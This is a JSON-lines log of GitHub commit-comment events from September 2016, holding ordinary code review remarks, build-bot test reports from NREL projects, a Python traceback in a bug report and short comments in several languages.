{"id":"4611690657","type":"CommitCommentEvent","actor":{"login":"gerryzhong"},"repo":{"name":"gerryzhong/gerry-python-journey"},"payload":{"comment":{"id":19155363,"position":null,"line":null,"path":null,"commit_id":"16780bdd71bbf09b1f3a6dcc770b3234eb5e5071","created_at":"2016-09-24T01:18:44Z","updated_at":"2016-09-24T01:18:44Z","body":"Summary/Collect xls format data dispersed in different excel files into one file using xlrd and xlwt package"}},"created_at":"2016-09-24T01:18:44Z"}
{"id":"4611690730","type":"CommitCommentEvent","actor":{"login":"gerryzhong"},"repo":{"name":"gerryzhong/gerry-python-journey"},"payload":{"comment":{"id":19155364,"position":null,"line":null,"path":null,"commit_id":"16780bdd71bbf09b1f3a6dcc770b3234eb5e5071","created_at":"2016-09-24T01:18:46Z","updated_at":"2016-09-24T01:18:46Z","body":"Summary/Collect xls format data dispersed in different excel files into one file using xlrd and xlwt package"}},"created_at":"2016-09-24T01:18:46Z"}
{"id":"4611690761","type":"CommitCommentEvent","actor":{"login":"gerryzhong"},"repo":{"name":"gerryzhong/gerry-python-journey"},"payload":{"comment":{"id":19155365,"position":null,"line":null,"path":null,"commit_id":"16780bdd71bbf09b1f3a6dcc770b3234eb5e5071","created_at":"2016-09-24T01:18:47Z","updated_at":"2016-09-24T01:18:47Z","body":"Summary/Collect xls format data dispersed in different excel files into one file using xlrd and xlwt package"}},"created_at":"2016-09-24T01:18:47Z"}
{"id":"4611690763","type":"CommitCommentEvent","actor":{"login":"gerryzhong"},"repo":{"name":"gerryzhong/gerry-python-journey"},"payload":{"comment":{"id":19155366,"position":null,"line":null,"path":null,"commit_id":"16780bdd71bbf09b1f3a6dcc770b3234eb5e5071","created_at":"2016-09-24T01:18:47Z","updated_at":"2016-09-24T01:18:47Z","body":"Summary/Collect xls format data dispersed in different excel files into one file using xlrd and xlwt package"}},"created_at":"2016-09-24T01:18:47Z"}
{"id":"4611690887","type":"CommitCommentEvent","actor":{"login":"gerryzhong"},"repo":{"name":"gerryzhong/gerry-python-journey"},"payload":{"comment":{"id":19155367,"position":null,"line":null,"path":null,"commit_id":"16780bdd71bbf09b1f3a6dcc770b3234eb5e5071","created_at":"2016-09-24T01:18:53Z","updated_at":"2016-09-24T01:18:53Z","body":"Summary/Collect xls format data dispersed in different excel files into one file using xlrd and xlwt package"}},"created_at":"2016-09-24T01:18:53Z"}
{"id":"4611691366","type":"CommitCommentEvent","actor":{"login":"gerryzhong"},"repo":{"name":"gerryzhong/gerry-python-journey"},"payload":{"comment":{"id":19155368,"position":null,"line":null,"path":null,"commit_id":"16780bdd71bbf09b1f3a6dcc770b3234eb5e5071","created_at":"2016-09-24T01:19:12Z","updated_at":"2016-09-24T01:19:12Z","body":"Summary/Collect xls format data dispersed in different excel files into one file using xlrd and xlwt package"}},"created_at":"2016-09-24T01:19:12Z"}
{"id":"4611692184","type":"CommitCommentEvent","actor":{"login":"fsaad"},"repo":{"name":"probcomp/bayeslite"},"payload":{"comment":{"id":19155374,"position":10,"line":449,"path":"src/bqlfn.py","commit_id":"9e5469e0c1d4fe503af02f3375093be7bace3ea6","created_at":"2016-09-24T01:19:44Z","updated_at":"2016-09-24T01:19:44Z","body":"See comment on `-1` in https://github.com/probcomp/bayeslite/commit/2bab92bc76d04161c3cf9cbf3f794f6796071556"}},"created_at":"2016-09-24T01:19:44Z"}
{"id":"4611699082","type":"CommitCommentEvent","actor":{"login":"cynorfleet"},"repo":{"name":"cynorfleet/Press_Your_Luck"},"payload":{"comment":{"id":19155405,"position":null,"line":null,"path":null,"commit_id":"9bea538e0f412e6839c0eb7190f29c5d5870f4de","created_at":"2016-09-24T01:24:14Z","updated_at":"2016-09-24T01:24:14Z","body":"### Why did you delete it?\r\n\r\n![aw_man](http://stream1.gifsoup.com/view1/4851153/aw-man-o.gif)"}},"created_at":"2016-09-24T01:24:14Z"}
{"id":"4611699447","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19155406,"position":null,"line":null,"path":null,"commit_id":"67964cef06caec5dfc0e0d0aa362766d7ae1fd9e","created_at":"2016-09-24T01:24:31Z","updated_at":"2016-09-24T01:24:31Z","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (1789 of 1789 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-67964cef06caec5dfc0e0d0aa362766d7ae1fd9e-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-67964cef06caec5dfc0e0d0aa362766d7ae1fd9e-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-24T01:24:31Z"}
{"id":"4611700042","type":"CommitCommentEvent","actor":{"login":"zardoru"},"repo":{"name":"zardoru/raindrop"},"payload":{"comment":{"id":19155408,"position":4,"line":122,"path":"GameData/Skins/default/screenselectmusic.lua","commit_id":"ba2b5f0e68e50feb6a32ddf49244c8b0867d4abb","created_at":"2016-09-24T01:24:57Z","updated_at":"2016-09-24T01:24:57Z","body":"I'll take note of this, thanks for that. For the most part this is used for colorization purposes, so this should be used internally instead... "}},"created_at":"2016-09-24T01:24:57Z"}
{"id":"4611701695","type":"CommitCommentEvent","actor":{"login":"ssut"},"repo":{"name":"ssut/telegram-rb"},"payload":{"comment":{"id":19155412,"position":null,"line":null,"path":null,"commit_id":"9d8cea498e56a682c075130b86c0f1f1e6ee2523","created_at":"2016-09-24T01:26:02Z","updated_at":"2016-09-24T01:26:02Z","body":"@igor04 As the method name says, I needed to make unsafe characters, which prevents sending some arguments to the telegram-cli, usable by wrapping these characters with double quotes. Not sure it's needed so far since the many parts of this library has been changed and the telegram-cli does, as well."}},"created_at":"2016-09-24T01:26:02Z"}
{"id":"4611702828","type":"CommitCommentEvent","actor":{"login":"Sifawm"},"repo":{"name":"FERRERDEV/ellix-web"},"payload":{"comment":{"id":19155416,"position":null,"line":null,"path":null,"commit_id":"e57f04b2cd46656fbb7b8ca23165b0cd61331f96","created_at":"2016-09-24T01:26:47Z","updated_at":"2016-09-24T01:26:47Z","body":"me gusta la nueva version."}},"created_at":"2016-09-24T01:26:47Z"}
{"id":"4611704772","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19155421,"position":null,"line":null,"path":null,"commit_id":"67964cef06caec5dfc0e0d0aa362766d7ae1fd9e","created_at":"2016-09-24T01:28:07Z","updated_at":"2016-09-24T01:28:07Z","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-67964cef06caec5dfc0e0d0aa362766d7ae1fd9e-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-24T01:28:07Z"}
{"id":"4611711517","type":"CommitCommentEvent","actor":{"login":"tkrokli"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19155443,"position":null,"line":null,"path":null,"commit_id":"0d70a7349d7b245adba72f9a15410a5b3d22dc77","created_at":"2016-09-24T01:32:50Z","updated_at":"2016-09-24T01:32:50Z","body":"Content related to [**[3.3.5][6.x] Quest: The Exorcism of Colonel Jules (25$ bounty)**](https://github.com/TrinityCore/TrinityCore/issues/15370) #15370"}},"created_at":"2016-09-24T01:32:50Z"}
{"id":"4611717274","type":"CommitCommentEvent","actor":{"login":"ilya-g"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19155459,"position":null,"line":null,"path":null,"commit_id":"f52c6e3227693d21b3fd18c9af9a35071bc4f852","created_at":"2016-09-24T01:37:00Z","updated_at":"2016-09-24T01:37:00Z","body":"Thanks for the proposal, we've discussed it and decided to go this way: with `AbstractMutableCollection` being inheritor with abstract overrides."}},"created_at":"2016-09-24T01:37:00Z"}
{"id":"4611719091","type":"CommitCommentEvent","actor":{"login":"shaun-edwards"},"repo":{"name":"geoffreychiou/godel"},"payload":{"comment":{"id":19155465,"position":35,"line":89,"path":"godel_plugins/CMakeLists.txt","commit_id":"4dfb1b296b3c78b55657c59095f9adad90a29181","created_at":"2016-09-24T01:38:17Z","updated_at":"2016-09-24T01:38:17Z","body":"Can you comment on why these changes are required?  As you can see from the previous items, it's preferred to use macros/variables instead of directly referencing the library name."}},"created_at":"2016-09-24T01:38:17Z"}
{"id":"4611719621","type":"CommitCommentEvent","actor":{"login":"shaun-edwards"},"repo":{"name":"geoffreychiou/godel"},"payload":{"comment":{"id":19155467,"position":1,"line":1,"path":"godel_robots/abb/godel_irb2400/godel_irb2400_support/CMakeLists_backup.txt","commit_id":"4dfb1b296b3c78b55657c59095f9adad90a29181","created_at":"2016-09-24T01:38:39Z","updated_at":"2016-09-24T01:38:39Z","body":"Did you mean to commit this?"}},"created_at":"2016-09-24T01:38:39Z"}
{"id":"4611721363","type":"CommitCommentEvent","actor":{"login":"shaun-edwards"},"repo":{"name":"geoffreychiou/godel"},"payload":{"comment":{"id":19155480,"position":null,"line":null,"path":null,"commit_id":"4dfb1b296b3c78b55657c59095f9adad90a29181","created_at":"2016-09-24T01:39:54Z","updated_at":"2016-09-24T01:39:54Z","body":"@geoffreychiou, thanks for the heads-up.  I just had a couple of questions above."}},"created_at":"2016-09-24T01:39:54Z"}
{"id":"4611722497","type":"CommitCommentEvent","actor":{"login":"bilousov94"},"repo":{"name":"bilousov94/random-machine"},"payload":{"comment":{"id":19155486,"position":98,"line":98,"path":"js.js","commit_id":"92e98906b87c4a45f296e464c8d70fb821ea529d","created_at":"2016-09-24T01:40:38Z","updated_at":"2016-09-24T01:40:38Z","body":"add partFour elemet"}},"created_at":"2016-09-24T01:40:38Z"}
{"id":"4611723996","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"madsjulia/Mads.jl"},"payload":{"comment":{"id":19155493,"position":4,"line":25,"path":"REQUIRE","commit_id":"db827c14bbb8b88499c01fd13624bdc848837ad2","created_at":"2016-09-24T01:41:32Z","updated_at":"2016-09-24T01:41:32Z","body":"see https://github.com/JuliaStats/DataArrays.jl/issues/168 - ambiguity warnings don't happen at load time any more on julia 0.5, but trying to call an ambiguous method is now a runtime error"}},"created_at":"2016-09-24T01:41:32Z"}
{"id":"4611727200","type":"CommitCommentEvent","actor":{"login":"caijingfeng"},"repo":{"name":"caijingfeng/codeRepository"},"payload":{"comment":{"id":19155499,"position":null,"line":null,"path":null,"commit_id":"87b8aa34dba94d293db7b931734abf000fc6286c","created_at":"2016-09-24T01:43:47Z","updated_at":"2016-09-24T01:43:47Z","body":"不错"}},"created_at":"2016-09-24T01:43:47Z"}
{"id":"4611728781","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19155508,"position":null,"line":null,"path":null,"commit_id":"64ee9ec93e7f2007da3a9bc35df0c5b6981e31eb","created_at":"2016-09-24T01:44:55Z","updated_at":"2016-09-24T01:44:55Z","body":"4989-PreliminaryPIUTstatControl (mjwitte) - Win64-Windows-7-VisualStudio-12: OK (2334 of 2344 tests passed, 25 test warnings)\n\n * 35 tests had: AUD diffs.\n * 6 tests had: EIO diffs.\n * 6 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 10 tests had: Table big diffs.\n * 1 test had: ERR diffs.\n * 15 tests had: Table small diffs.\n * 3 tests had: RDD diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-64ee9ec93e7f2007da3a9bc35df0c5b6981e31eb-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-64ee9ec93e7f2007da3a9bc35df0c5b6981e31eb-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.57%25-yellow.svg)</a> \n"}},"created_at":"2016-09-24T01:44:55Z"}
{"id":"4611729309","type":"CommitCommentEvent","actor":{"login":"tobias"},"repo":{"name":"projectodd/kubesh"},"payload":{"comment":{"id":19155510,"position":66,"line":75,"path":"kubesh.go","commit_id":"364bbd19ae2c304345c7ad6153eef8db289d34f2","created_at":"2016-09-24T01:45:17Z","updated_at":"2016-09-24T01:45:17Z","body":"We can easily change it, but let's talk on Monday, since I have more thoughts about the `cd` abstraction than I care to cover tonight."}},"created_at":"2016-09-24T01:45:17Z"}
{"id":"4611730012","type":"CommitCommentEvent","actor":{"login":"sbstp"},"repo":{"name":"streamlink/streamlink"},"payload":{"comment":{"id":19155513,"position":null,"line":null,"path":null,"commit_id":"183cb75deb08004ff09fab31a18b6f48721d8bc3","created_at":"2016-09-24T01:45:42Z","updated_at":"2016-09-24T01:45:42Z","body":"I'm not sure. I tried to use the tool in place and it didn't work. I tried similar tools and none worked."}},"created_at":"2016-09-24T01:45:42Z"}
{"id":"4611730449","type":"CommitCommentEvent","actor":{"login":"charupun"},"repo":{"name":"rovo89/Xposed"},"payload":{"comment":{"id":19155516,"position":null,"line":null,"path":null,"commit_id":"92f8ced47274b6682407872fd11b0697014ede30","created_at":"2016-09-24T01:46:00Z","updated_at":"2016-09-24T01:46:00Z","body":"Ffff"}},"created_at":"2016-09-24T01:46:00Z"}
{"id":"4611730504","type":"CommitCommentEvent","actor":{"login":"DeivisonMaster"},"repo":{"name":"DeivisonMaster/desenvolvimentoweb"},"payload":{"comment":{"id":19155517,"position":10,"line":11,"path":"build/web/index.xhtml","commit_id":"d369f091210f3c52b60e79876063a2fdc4100ae4","created_at":"2016-09-24T01:46:02Z","updated_at":"2016-09-24T01:46:02Z","body":"comentario"}},"created_at":"2016-09-24T01:46:02Z"}
{"id":"4611739870","type":"CommitCommentEvent","actor":{"login":"cove"},"repo":{"name":"hypothesis/h"},"payload":{"comment":{"id":19155553,"position":4,"line":66,"path":"h/static/styles/partials-v2/_search.scss","commit_id":"f42d9c15f8cdb241374a6a5daa502944c2c803ef","created_at":"2016-09-24T01:52:58Z","updated_at":"2016-09-24T01:52:58Z","body":"fyi @sean-roberts looks like a git conflict message got committed here."}},"created_at":"2016-09-24T01:52:58Z"}
{"id":"4611742169","type":"CommitCommentEvent","actor":{"login":"montehurd"},"repo":{"name":"wikimedia/wikipedia-ios"},"payload":{"comment":{"id":19155557,"position":14,"line":171,"path":"Wikipedia/Code/YapDatabase+WMFViews.m","commit_id":"5e96f41911c84ab66b226bbff3762bbf824435b2","created_at":"2016-09-24T01:54:40Z","updated_at":"2016-09-24T01:54:40Z","body":"Will changing this string affect YAP negatively? Is it using it to name things?"}},"created_at":"2016-09-24T01:54:40Z"}
{"id":"4611742268","type":"CommitCommentEvent","actor":{"login":"yihui"},"repo":{"name":"geanders/RProgrammingForResearch"},"payload":{"comment":{"id":19155558,"position":null,"line":null,"path":null,"commit_id":"4e197a0338a589f612a0a6c3d10a64d43250dd73","created_at":"2016-09-24T01:54:45Z","updated_at":"2016-09-24T01:54:45Z","body":"Just hold on. I'm trying to figure out what was wrong now."}},"created_at":"2016-09-24T01:54:45Z"}
{"id":"4611743000","type":"CommitCommentEvent","actor":{"login":"whagi"},"repo":{"name":"whagi/hello-world"},"payload":{"comment":{"id":19155561,"position":null,"line":null,"path":null,"commit_id":"ab6a71e48254d113e78da62b9824f181726b08b3","created_at":"2016-09-24T01:55:16Z","updated_at":"2016-09-24T01:55:16Z","body":"aadd"}},"created_at":"2016-09-24T01:55:16Z"}
{"id":"4611744451","type":"CommitCommentEvent","actor":{"login":"rksm"},"repo":{"name":"LivelyKernel/lively.morphic"},"payload":{"comment":{"id":19155567,"position":null,"line":null,"path":null,"commit_id":"9f6755d18591829680823388e79b96c5bce76123","created_at":"2016-09-24T01:56:22Z","updated_at":"2016-09-24T01:56:22Z","body":"👍 "}},"created_at":"2016-09-24T01:56:22Z"}
{"id":"4611745389","type":"CommitCommentEvent","actor":{"login":"montehurd"},"repo":{"name":"wikimedia/wikipedia-ios"},"payload":{"comment":{"id":19155569,"position":6,"line":59,"path":"Wikipedia/Code/WMFContinueReadingSectionController.m","commit_id":"5c1d28b1779ff5ea3752458e33c7f6b624ae3015","created_at":"2016-09-24T01:57:08Z","updated_at":"2016-09-24T01:57:08Z","body":"Hmm maybe I should confirm 'historyEntry' isn't nil..."}},"created_at":"2016-09-24T01:57:08Z"}
{"id":"4611746644","type":"CommitCommentEvent","actor":{"login":"adriancole"},"repo":{"name":"openzipkin/zipkin"},"payload":{"comment":{"id":19155572,"position":58,"line":55,"path":"zipkin-autoconfigure/storage-elasticsearch-aws/src/main/java/zipkin/autoconfigure/storage/elasticsearch/aws/AwsSignatureInterceptor.java","commit_id":"58fa61a78af904dd775dff571e930f95b4e78815","created_at":"2016-09-24T01:58:06Z","updated_at":"2016-09-24T01:58:06Z","body":"how would its setters be called concurrently? the client is a lazy right?"}},"created_at":"2016-09-24T01:58:06Z"}
{"id":"4611747512","type":"CommitCommentEvent","actor":{"login":"grass4496"},"repo":{"name":"grass4496/test"},"payload":{"comment":{"id":19155576,"position":null,"line":null,"path":null,"commit_id":"d6fae4976aaf18ed3c7a9310e692bf1b49f0f1c0","created_at":"2016-09-24T01:58:46Z","updated_at":"2016-09-24T01:58:46Z","body":"how?"}},"created_at":"2016-09-24T01:58:46Z"}
{"id":"4611748527","type":"CommitCommentEvent","actor":{"login":"facelessuser"},"repo":{"name":"facelessuser/ApplySyntax"},"payload":{"comment":{"id":19155580,"position":3,"line":3,"path":"readme.md","commit_id":"a77e39249a7c044ead2303c45e6df63d0f60d175","created_at":"2016-09-24T01:59:31Z","updated_at":"2016-09-24T01:59:31Z","body":"Huh 😕 ?"}},"created_at":"2016-09-24T01:59:31Z"}
{"id":"4612294973","type":"CommitCommentEvent","actor":{"login":"JavaProgrammerLB"},"repo":{"name":"yulu/yulu.github.io"},"payload":{"comment":{"id":19157442,"position":null,"line":null,"path":null,"commit_id":"fabc0250a90793f326e72a71bcf1aaaec56c6052","created_at":"2016-09-24T10:01:37Z","updated_at":"2016-09-24T10:01:37Z","body":"Long time no article update，you change a lot page style.Looking forward the new article"}},"created_at":"2016-09-24T10:01:37Z"}
{"id":"4612296074","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19157446,"position":null,"line":null,"path":null,"commit_id":"f4eb0447f0b6ae843b22a19fe2b717cb90afd619","created_at":"2016-09-24T10:02:28Z","updated_at":"2016-09-24T10:02:28Z","body":"for_cbes (YixingChen) - i386-Windows-7-VisualStudio-12: OK (2303 of 2447 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-f4eb0447f0b6ae843b22a19fe2b717cb90afd619-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-f4eb0447f0b6ae843b22a19fe2b717cb90afd619-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-94.12%25-yellow.svg)</a> \n"}},"created_at":"2016-09-24T10:02:28Z"}
{"id":"4612297590","type":"CommitCommentEvent","actor":{"login":"pgathogo"},"repo":{"name":"gltn/stdm"},"payload":{"comment":{"id":19157448,"position":null,"line":null,"path":null,"commit_id":"739db913ecc2b3246af8e2db3de71bbec9e27f48","created_at":"2016-09-24T10:03:49Z","updated_at":"2016-09-24T10:03:49Z","body":"Dear John,\r\n\r\nAm getting the following stack trace when I rename the entity and attempt to save the profile.\r\n\r\nMy original entity short name was 'Party', renamed it to 'Person'.\r\n\r\nAn error has occurred while executing Python code: \r\n\r\nAttributeError: 'NoneType' object has no attribute 'short_name' \r\nTraceback (most recent call last):\r\n  File \"C:/Users/Administrator/.qgis2/python/plugins\\stdm\\ui\\wizard\\wizard.py\", line 777, in validateCurrentPage\r\n    self.backup_config_file()\r\n  File \"C:/Users/Administrator/.qgis2/python/plugins\\stdm\\ui\\wizard\\wizard.py\", line 955, in backup_config_file\r\n    cfs.save()\r\n  File \"C:/Users/Administrator/.qgis2/python/plugins\\stdm\\settings\\config_serializer.py\", line 97, in save\r\n    self.write_xml(config_document)\r\n  File \"C:/Users/Administrator/.qgis2/python/plugins\\stdm\\settings\\config_serializer.py\", line 116, in write_xml\r\n    ProfileSerializer.write_xml(p, config_element, document)\r\n  File \"C:/Users/Administrator/.qgis2/python/plugins\\stdm\\settings\\config_serializer.py\", line 423, in write_xml\r\n    profile_element, document)\r\n  File \"C:/Users/Administrator/.qgis2/python/plugins\\stdm\\settings\\config_serializer.py\", line 490, in write_xml\r\n    social_tenure.party.short_name)\r\nAttributeError: 'NoneType' object has no attribute 'short_name'\r\n\r\nRegards\r\n\r\n"}},"created_at":"2016-09-24T10:03:49Z"}
{"id":"4612297935","type":"CommitCommentEvent","actor":{"login":"siddharthkp"},"repo":{"name":"siddharthkp/sandbox"},"payload":{"comment":{"id":19157449,"position":null,"line":null,"path":null,"commit_id":"5adef799065b61655865e938793e1c4fcafb3f43","created_at":"2016-09-24T10:04:08Z","updated_at":"2016-09-24T10:04:08Z","body":"Right tools for the right job?"}},"created_at":"2016-09-24T10:04:08Z"}
{"id":"4612299749","type":"CommitCommentEvent","actor":{"login":"monibu1548"},"repo":{"name":"All-door/Artik_internal_controller"},"payload":{"comment":{"id":19157452,"position":null,"line":null,"path":null,"commit_id":"44e26d1695b5cfcd73d10aeb8d1f91614c8d1694","created_at":"2016-09-24T10:05:39Z","updated_at":"2016-09-24T10:05:39Z","body":"전체적으로 논리가 안맞아요ㅠ\r\n\r\n지금 맡은부분이 주기적으로 센서값을 읽어서 Redis 에 저장하는 부분입니다.\r\n\r\n1.  Sensor.py 에서 모두 처리하는 방법\r\n2. Sensor.py  에서는 센서값을 읽어오는 함수만 제공하고 또다른 모듈에서 주기적으로 Sensor.py 를통해 가뎌온 값을 저장하는 형태\r\n\r\n뭐 두가지로 처리가 가능할걸로보입니다.\r\n\r\n어떤 방법으로 구현하려는건가요\r\n"}},"created_at":"2016-09-24T10:05:39Z"}
{"id":"4612299823","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"a530788140/phonebook"},"payload":{"comment":{"id":19157453,"position":null,"line":null,"path":null,"commit_id":"430f326384d485a3f5d84befe6396c1300810708","created_at":"2016-09-24T10:05:43Z","updated_at":"2016-09-24T10:05:43Z","body":"Don't write \"first commit in the subject of GIT commit message\", which is meaningless."}},"created_at":"2016-09-24T10:05:43Z"}
{"id":"4612300187","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"a530788140/phonebook"},"payload":{"comment":{"id":19157455,"position":4,"line":15,"path":"calculate.c","commit_id":"430f326384d485a3f5d84befe6396c1300810708","created_at":"2016-09-24T10:06:01Z","updated_at":"2016-09-24T10:06:01Z","body":"Don't leave the extra blank lines!"}},"created_at":"2016-09-24T10:06:01Z"}
{"id":"4612300730","type":"CommitCommentEvent","actor":{"login":"g0rdan"},"repo":{"name":"g0rdan/MvvmCross"},"payload":{"comment":{"id":19157457,"position":null,"line":null,"path":null,"commit_id":"1a8d193486a4986ef8f9cba66897739667f852d6","created_at":"2016-09-24T10:06:26Z","updated_at":"2016-09-24T10:06:26Z","body":"Unnecessary lines, i guess"}},"created_at":"2016-09-24T10:06:26Z"}
{"id":"4612301085","type":"CommitCommentEvent","actor":{"login":"labkey-teamcity"},"repo":{"name":"LabKey/cds"},"payload":{"comment":{"id":19157460,"position":null,"line":null,"path":null,"commit_id":"909d0979ffa6e8f59f964da057727211b163b1d0","created_at":"2016-09-24T10:06:43Z","updated_at":"2016-09-24T10:06:43Z","body":"TeamCity LabKey :: LabkeyModules15.2 :: CDS postgres 9.4 [Build 71](https://teamcity.labkey.org/viewLog.html?buildId=365424&buildTypeId=LabkeyModules152_CdsPostgres93) outcome was **FAILURE**\nSummary: Exit code 1 (new) Build time: 00:01:28"}},"created_at":"2016-09-24T10:06:43Z"}
{"id":"4612301391","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"a530788140/phonebook"},"payload":{"comment":{"id":19157462,"position":28,"line":61,"path":"main.c","commit_id":"430f326384d485a3f5d84befe6396c1300810708","created_at":"2016-09-24T10:06:57Z","updated_at":"2016-09-24T10:06:57Z","body":"Don't leave the extra blank. Use `astyle` to indent."}},"created_at":"2016-09-24T10:06:57Z"}
{"id":"4612301896","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"a530788140/phonebook"},"payload":{"comment":{"id":19157463,"position":45,"line":76,"path":"main.c","commit_id":"430f326384d485a3f5d84befe6396c1300810708","created_at":"2016-09-24T10:07:21Z","updated_at":"2016-09-24T10:07:21Z","body":"Don't change that. You should minimize the working change."}},"created_at":"2016-09-24T10:07:21Z"}
{"id":"4612302820","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"a530788140/phonebook"},"payload":{"comment":{"id":19157466,"position":16,"line":11,"path":"phonebook_opt.c","commit_id":"430f326384d485a3f5d84befe6396c1300810708","created_at":"2016-09-24T10:08:07Z","updated_at":"2016-09-24T10:08:07Z","body":"You have to follow the consistent coding style. Read the instructions of assignment about `astyle` carefully."}},"created_at":"2016-09-24T10:08:07Z"}
{"id":"4612302958","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"a530788140/phonebook"},"payload":{"comment":{"id":19157468,"position":30,"line":24,"path":"phonebook_opt.c","commit_id":"430f326384d485a3f5d84befe6396c1300810708","created_at":"2016-09-24T10:08:12Z","updated_at":"2016-09-24T10:08:12Z","body":"You have to follow the consistent coding style. Read the instructions of assignment about `astyle` carefully."}},"created_at":"2016-09-24T10:08:12Z"}
{"id":"4612303713","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"a530788140/phonebook"},"payload":{"comment":{"id":19157471,"position":5,"line":18,"path":"Makefile","commit_id":"72703f3570acdcba5c4334ae4b660ba91c96ff24","created_at":"2016-09-24T10:08:47Z","updated_at":"2016-09-24T10:08:47Z","body":"Split the change into other commit. Focus!"}},"created_at":"2016-09-24T10:08:47Z"}
{"id":"4612304162","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"a530788140/phonebook"},"payload":{"comment":{"id":19157472,"position":5,"line":9,"path":"main.c","commit_id":"72703f3570acdcba5c4334ae4b660ba91c96ff24","created_at":"2016-09-24T10:09:12Z","updated_at":"2016-09-24T10:09:12Z","body":"Why? You have to explain the change."}},"created_at":"2016-09-24T10:09:12Z"}
{"id":"4612304280","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"a530788140/phonebook"},"payload":{"comment":{"id":19157473,"position":8,"line":15,"path":"phonebook_opt.c","commit_id":"72703f3570acdcba5c4334ae4b660ba91c96ff24","created_at":"2016-09-24T10:09:18Z","updated_at":"2016-09-24T10:09:18Z","body":"You have to follow the consistent coding style. Read the instructions of assignment about `astyle` carefully."}},"created_at":"2016-09-24T10:09:18Z"}
{"id":"4612304397","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"a530788140/phonebook"},"payload":{"comment":{"id":19157474,"position":46,"line":73,"path":"phonebook_opt.c","commit_id":"72703f3570acdcba5c4334ae4b660ba91c96ff24","created_at":"2016-09-24T10:09:25Z","updated_at":"2016-09-24T10:09:25Z","body":"You have to follow the consistent coding style. Read the instructions of assignment about `astyle` carefully."}},"created_at":"2016-09-24T10:09:25Z"}
{"id":"4612304751","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"c14006078/phonebook-1"},"payload":{"comment":{"id":19157475,"position":21,"line":21,"path":"phonebook_opt.c","commit_id":"8f15975df0ce9a8cb2e2846a7ed6fde931c0ab56","created_at":"2016-09-24T10:09:46Z","updated_at":"2016-09-24T10:09:46Z","body":"You have to follow the consistent coding style. Read the instructions of assignment about `astyle` carefully."}},"created_at":"2016-09-24T10:09:46Z"}
{"id":"4612304896","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"c14006078/phonebook-1"},"payload":{"comment":{"id":19157476,"position":10,"line":10,"path":"phonebook_opt.c","commit_id":"8f15975df0ce9a8cb2e2846a7ed6fde931c0ab56","created_at":"2016-09-24T10:09:53Z","updated_at":"2016-09-24T10:09:53Z","body":"You have to follow the consistent coding style. Read the instructions of assignment about `astyle` carefully."}},"created_at":"2016-09-24T10:09:53Z"}
{"id":"4612305225","type":"CommitCommentEvent","actor":{"login":"neofung"},"repo":{"name":"djyde/We2EX"},"payload":{"comment":{"id":19157477,"position":4,"line":6,"path":"page/hot/hot.wxml","commit_id":"d5ce936d5afd7bde0113b5cdb43c36637c737cef","created_at":"2016-09-24T10:10:05Z","updated_at":"2016-09-24T10:10:05Z","body":"</view>要留着"}},"created_at":"2016-09-24T10:10:05Z"}
{"id":"4612305760","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"c14006078/phonebook-1"},"payload":{"comment":{"id":19157478,"position":19,"line":54,"path":"main.c","commit_id":"93ec8878cbfbb0fe8dcf990cae536c1d95afb4e8","created_at":"2016-09-24T10:10:32Z","updated_at":"2016-09-24T10:10:32Z","body":"You have to follow the consistent coding style. Read the instructions of assignment about `astyle` carefully."}},"created_at":"2016-09-24T10:10:32Z"}
